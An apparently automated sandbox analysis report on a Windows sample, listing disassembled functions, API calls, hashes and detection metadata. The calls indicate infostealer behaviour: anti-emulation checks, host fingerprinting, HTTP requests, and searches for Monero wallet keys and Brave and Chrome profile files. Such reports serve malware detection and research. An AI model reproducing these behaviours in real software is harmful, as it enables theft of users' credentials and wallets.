                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                  • String ID: @
                  • API String ID: 3404098578-2766056989
                  • Opcode ID: f1e58a667a905c5275cfa06d146bedeaeeebaf04cca6475ca38b24b5ed5a83af
                  • Instruction ID: 48594a053a37589096208a23e50f5127f5a5686939e15033d48f87583dc15cb4
                  • Opcode Fuzzy Hash: f1e58a667a905c5275cfa06d146bedeaeeebaf04cca6475ca38b24b5ed5a83af
                  • Instruction Fuzzy Hash: DC014FB0950308ABEB10DBD0CC49B9DBB78AB04711F248054EA05BA281DA7495618B99
                  Function 002B6AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1450 2b6af3 1451 2b6b0a 1450->1451 1453 2b6aba-2b6ad7 call 2baad0 OpenEventA 1451->1453 1454 2b6b0c-2b6b22 call 2b6920 call 2b5b10 CloseHandle ExitProcess 1451->1454 1459 2b6ad9-2b6af1 call 2baad0 CreateEventA 1453->1459 1460 2b6af5-2b6b04 CloseHandle Sleep 1453->1460 1459->1454 1460->1451
                  APIs
                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00D58BF8,?,002C110C,?,00000000,?,002C1110,?,00000000,002C0AEF), ref: 002B6ACA
                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 002B6AE8
                  • CloseHandle.KERNEL32(00000000), ref: 002B6AF9
                  • Sleep.KERNEL32(00001770), ref: 002B6B04
                  • CloseHandle.KERNEL32(?,00000000,?,00D58BF8,?,002C110C,?,00000000,?,002C1110,?,00000000,002C0AEF), ref: 002B6B1A
                  • ExitProcess.KERNEL32 ref: 002B6B22
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                  • String ID:
                  • API String ID: 941982115-0
                  • Opcode ID: 4ee3e984a72548ad5635c75491201da46179302bc787db60ba8548eaf29057d2
                  • Instruction ID: a2a514d4a7f0b060fc61663e42784e9a9069fee83a8bf6e935c4820cf52e6952
                  • Opcode Fuzzy Hash: 4ee3e984a72548ad5635c75491201da46179302bc787db60ba8548eaf29057d2
                  • Instruction Fuzzy Hash: 52F05E7096021AAFEB00EBA0DC4ABFD7B34FB04785F104925B502B91C2CBF46560DA6A
                  Function 002A47B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 002A4839
                  • InternetCrackUrlA.WININET(00000000,00000000), ref: 002A4849
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: CrackInternetlstrlen
                  • String ID: <
                  • API String ID: 1274457161-4251816714
                  • Opcode ID: e5a9aeddea5511a7848ffc6312fb251b144f13c8ca7b907aeb0aec7cf36490bc
                  • Instruction ID: 2dee00600a4f1842fb017b2a12d845d0b2fc493cd090558736b6ee403e95eb39
                  • Opcode Fuzzy Hash: e5a9aeddea5511a7848ffc6312fb251b144f13c8ca7b907aeb0aec7cf36490bc
                  • Instruction Fuzzy Hash: B7214DB1D00209ABDF14DFA4E845ADE7B74FB45320F108625F965AB2C0EB706A19CF91
                  Function 002B51F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                    • Part of subcall function 002BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 002BA7E6
                    • Part of subcall function 002A6280: InternetOpenA.WININET(002C0DFE,00000001,00000000,00000000,00000000), ref: 002A62E1
                    • Part of subcall function 002A6280: StrCmpCA.SHLWAPI(?,00D5FCE0), ref: 002A6303
                    • Part of subcall function 002A6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 002A6335
                    • Part of subcall function 002A6280: HttpOpenRequestA.WININET(00000000,GET,?,00D5F350,00000000,00000000,00400100,00000000), ref: 002A6385
                    • Part of subcall function 002A6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 002A63BF
                    • Part of subcall function 002A6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 002A63D1
                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 002B5228
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                  • String ID: ERROR$ERROR
                  • API String ID: 3287882509-2579291623
                  • Opcode ID: 96cb97f2e1e83a266431b8fdbcc48375c93ca6ac261b2411344336037759b378
                  • Instruction ID: 87279de862f240f1d6be875d5ee5c669cc4127d7ad5473952c64dd28f81e4756
                  • Opcode Fuzzy Hash: 96cb97f2e1e83a266431b8fdbcc48375c93ca6ac261b2411344336037759b378
                  • Instruction Fuzzy Hash: 8811EC30920148BBDB14FF64DD52AED7778AF50380F804258F91A5A592EF30AB25CE91
                  Function 002B78E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 002B7910
                  • RtlAllocateHeap.NTDLL(00000000), ref: 002B7917
                  • GetComputerNameA.KERNEL32(?,00000104), ref: 002B792F
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateComputerNameProcess
                  • String ID:
                  • API String ID: 1664310425-0
                  • Opcode ID: f24957267b9dbd1ae70b2752bb6ab538543db5e82f46366f906cdf47520e68d7
                  • Instruction ID: 422b96482dc7cff80d2241f92d7e048c1a139bba5ac7e7a60c7757bbdba475f4
                  • Opcode Fuzzy Hash: f24957267b9dbd1ae70b2752bb6ab538543db5e82f46366f906cdf47520e68d7
                  • Instruction Fuzzy Hash: DD01F9B1914644EFC700DF84CC45FEEBBB8F744B51F100229F601E3280C37459108BA1
                  Function 002A1110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 002A112B
                  • VirtualAllocExNuma.KERNEL32(00000000), ref: 002A1132
                  • ExitProcess.KERNEL32 ref: 002A1143
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Process$AllocCurrentExitNumaVirtual
                  • String ID:
                  • API String ID: 1103761159-0
                  • Opcode ID: cc74ed422f880ffbf6d85a7c658f2772d913c8beb273e358c696691733667c7c
                  • Instruction ID: cb9f023abd04a2ebaf85136b30c894581bf1f78a033da6a5a8017ebfcf47bff4
                  • Opcode Fuzzy Hash: cc74ed422f880ffbf6d85a7c658f2772d913c8beb273e358c696691733667c7c
                  • Instruction Fuzzy Hash: FCE08670955348FFE710ABA09C0AB087A78AB04B11F104054F7087A1C1DAB436209A9D
                  Function 002A10A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                  Download Yara Rule
                  APIs
                  • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 002A10B3
                  • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 002A10F7
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Virtual$AllocFree
                  • String ID:
                  • API String ID: 2087232378-0
                  • Opcode ID: 03be39d26fed32ff5f88b78cc2bb5a626965f9428c2152334f900b760c4c7417
                  • Instruction ID: c494966983fe7f7805f9875c8705f1b3c0e66659113eeb6b8cdb3c01b2e3581f
                  • Opcode Fuzzy Hash: 03be39d26fed32ff5f88b78cc2bb5a626965f9428c2152334f900b760c4c7417
                  • Instruction Fuzzy Hash: 37F0E971641204BBE7149AA49C49FAAB7ECE705715F300454F904E7280D571AE10CA64
                  Function 002A1190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 002B78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 002B7910
                    • Part of subcall function 002B78E0: RtlAllocateHeap.NTDLL(00000000), ref: 002B7917
                    • Part of subcall function 002B78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 002B792F
                    • Part of subcall function 002B7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,002A11B7), ref: 002B7880
                    • Part of subcall function 002B7850: RtlAllocateHeap.NTDLL(00000000), ref: 002B7887
                    • Part of subcall function 002B7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 002B789F
                  • ExitProcess.KERNEL32 ref: 002A11C6
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$Process$AllocateName$ComputerExitUser
                  • String ID:
                  • API String ID: 3550813701-0
                  • Opcode ID: baaf0716cbff8ffc75465a4d93c327d9e7c18a36a4d84125d24c6d315882bc60
                  • Instruction ID: 914683b37a50dfb9e85ee3654f4e12e174fafa1e47c54c452cd5967dab8b5cf0
                  • Opcode Fuzzy Hash: baaf0716cbff8ffc75465a4d93c327d9e7c18a36a4d84125d24c6d315882bc60
                  • Instruction Fuzzy Hash: 29E012B593430253CA0077B0AC4AB6A369C5B553C5F040434FA0DD6103FE25F831DA6A

                  Non-executed Functions

                  Function 002B38B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                  Download Yara Rule
                  APIs
                  • wsprintfA.USER32 ref: 002B38CC
                  • FindFirstFileA.KERNEL32(?,?), ref: 002B38E3
                  • lstrcat.KERNEL32(?,?), ref: 002B3935
                  • StrCmpCA.SHLWAPI(?,002C0F70), ref: 002B3947
                  • StrCmpCA.SHLWAPI(?,002C0F74), ref: 002B395D
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 002B3C67
                  • FindClose.KERNEL32(000000FF), ref: 002B3C7C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                  • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                  • API String ID: 1125553467-2524465048
                  • Opcode ID: 0ece20c0f641f3130a3c8fff04959e4cde7f94a32a7957154ee3c1ca3ecbdf73
                  • Instruction ID: 1e48ea490ba421c0077682efd35ab81a2df0d6f4cd5dc30be45934f7fb95a4ac
                  • Opcode Fuzzy Hash: 0ece20c0f641f3130a3c8fff04959e4cde7f94a32a7957154ee3c1ca3ecbdf73
                  • Instruction Fuzzy Hash: 4FA162B1910258ABDB24DFA4DC85FEE7378BF45340F044598F60D96141EB74ABA4CF62
                  Function 002ABE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 002BA740: lstrcpy.KERNEL32(002C0E17,00000000), ref: 002BA788
                    • Part of subcall function 002BA920: lstrcpy.KERNEL32(00000000,?), ref: 002BA972
                    • Part of subcall function 002BA920: lstrcat.KERNEL32(00000000), ref: 002BA982
                    • Part of subcall function 002BA9B0: lstrlen.KERNEL32(?,00D58908,?,\Monero\wallet.keys,002C0E17), ref: 002BA9C5
                    • Part of subcall function 002BA9B0: lstrcpy.KERNEL32(00000000), ref: 002BAA04
                    • Part of subcall function 002BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 002BAA12
                    • Part of subcall function 002BA8A0: lstrcpy.KERNEL32(?,002C0E17), ref: 002BA905
                  • FindFirstFileA.KERNEL32(00000000,?,002C0B32,002C0B2B,00000000,?,?,?,002C13F4,002C0B2A), ref: 002ABEF5
                  • StrCmpCA.SHLWAPI(?,002C13F8), ref: 002ABF4D
                  • StrCmpCA.SHLWAPI(?,002C13FC), ref: 002ABF63
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 002AC7BF
                  • FindClose.KERNEL32(000000FF), ref: 002AC7D1
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                  • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                  • API String ID: 3334442632-726946144
                  • Opcode ID: c421ab4550fea4c7c648f4e42f2b564bacfee97fef2d0bbb30061fe875087938
                  • Instruction ID: a8053045178203aa13f30c718b0d8dfd72957c591df649b063a2a2135cbf07df
                  • Opcode Fuzzy Hash: c421ab4550fea4c7c648f4e42f2b564bacfee97fef2d0bbb30061fe875087938
                  • Instruction Fuzzy Hash: 02423672920104ABDB14FB70DD96EED737DAF54340F404568F90AA6181EF34AB69CFA2
                  Function 002B4910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                  Download Yara Rule
                  APIs
                  • wsprintfA.USER32 ref: 002B492C
                  • FindFirstFileA.KERNEL32(?,?), ref: 002B4943
                  • StrCmpCA.SHLWAPI(?,002C0FDC), ref: 002B4971
                  • StrCmpCA.SHLWAPI(?,002C0FE0), ref: 002B4987
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 002B4B7D
                  • FindClose.KERNEL32(000000FF), ref: 002B4B92
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
